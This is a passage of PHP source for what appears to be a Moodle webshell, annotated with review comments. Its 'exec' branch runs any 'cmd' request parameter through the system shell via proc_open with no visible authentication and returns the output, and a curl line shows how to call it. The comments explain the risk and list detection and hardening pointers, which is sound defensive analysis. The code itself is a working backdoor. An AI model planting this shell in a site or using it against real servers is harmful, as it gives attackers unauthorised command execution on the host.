"Path " . $path_to_file . " does not exist or is not readable.", "path" => $path_to_file]);
    }
} else if($action == "exec"){
    /* * USAGE: * curl -X POST 'http://127.0.0.1/local/moodle_webshell/rce_local.php' --data "action=exec&cmd=id" */

    // NOTE(review): this branch is a remote command-execution handler. The
    // command string comes unmodified from the request ($_REQUEST merges GET
    // and POST parameters, and cookies depending on request_order) and is
    // handed to proc_open() as a string, which PHP runs through the system
    // shell. No authentication, authorization or CSRF check is visible in
    // this fragment; the start of the file is outside this view, so confirm
    // there. The child runs with the privileges of the PHP/web-server user.
    //
    // Defender pointers: the web-server or PHP-FPM user spawning shell
    // children, requests carrying "action=exec" together with a "cmd"
    // parameter, and unexpected PHP files under the application's plugin
    // directories are the observable traces of this pattern. Listing
    // proc_open (and the other process-execution functions) in php.ini
    // disable_functions, plus file-integrity monitoring on the web root,
    // removes or exposes it.
    $command = $_REQUEST["cmd"];

    $descriptorspec = array(
        0 => array("pipe", "w"), // descriptor 0 is the child's stdin; $pipes[0] is never used in the visible code
        1 => array("pipe", "w"), // stdout is a pipe that the child will write to
        2 => array("pipe", "w")  // stderr is a pipe that the child will write to
    );

    // The working directory is moved to the filesystem root before the child
    // is started, so the child inherits "/" as its cwd.
    chdir("/");
    $process = proc_open($command, $descriptorspec, $pipes);

    // If the process could not be started the script ends with status 1 and
    // sends no body.
    if(!is_resource($process)){
        exit(1);
    }

    // Read the child's stdout in $chunk_size pieces until EOF or an empty
    // read. $chunk_size is defined outside the visible fragment.
    $stdout = "";
    $buffer = "";
    do {
        $buffer = fread($pipes[1], $chunk_size);
        $stdout = $stdout . $buffer;
    } while ((!feof($pipes[1])) && (strlen($buffer) != 0));

    // Same loop for stderr; it only starts once the stdout loop has finished.
    $stderr = "";
    $buffer = "";
    do {
        $buffer = fread($pipes[2], $chunk_size);
        $stderr = $stderr . $buffer;
    } while ((!feof($pipes[2])) && (strlen($buffer) != 0));

    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);

    // The response body echoes the submitted command followed by its output:
    // stdout when it is non-empty, otherwise stderr. addcslashes() backslash-
    // escapes CR, TAB, backslash, single quote and NUL, and iconv() converts
    // the result from UTF-8 to UTF-8. The request parameter is reflected into
    // the response without HTML encoding.
    echo iconv('UTF-8', 'UTF-8', addcslashes("
[command]\n~$ ".$command."
[response]\n".(empty($stdout) ? $stderr : $stdout), "\r\t\\'\0"));
}
?>